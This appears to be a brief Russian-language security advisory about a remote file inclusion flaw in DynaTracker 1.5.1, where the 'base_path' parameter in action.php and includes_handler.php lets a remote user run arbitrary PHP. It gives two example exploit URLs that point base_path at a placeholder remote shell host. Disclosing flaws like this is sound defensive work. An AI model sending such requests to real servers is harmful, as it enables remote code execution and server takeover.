Программа: DynaTracker 1.5.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «base_path» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.example.com/DynaTracker_v151/action.php?base_path=http://shell
http://www.example.com/DynaTracker_v151/includes_handler.php?base_path=http://shell



Оставить мнение